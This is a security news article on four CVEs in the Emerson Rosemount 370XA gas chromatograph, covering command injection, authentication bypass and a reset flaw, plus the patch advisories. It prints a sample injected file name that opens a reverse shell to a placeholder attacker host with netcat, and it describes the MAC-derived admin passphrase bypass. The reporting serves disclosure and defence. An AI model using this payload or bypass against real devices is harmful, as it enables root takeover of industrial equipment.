Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands.
Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.
Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.
The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.
An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.
The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.
Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.
The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.
Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.
The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.
In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.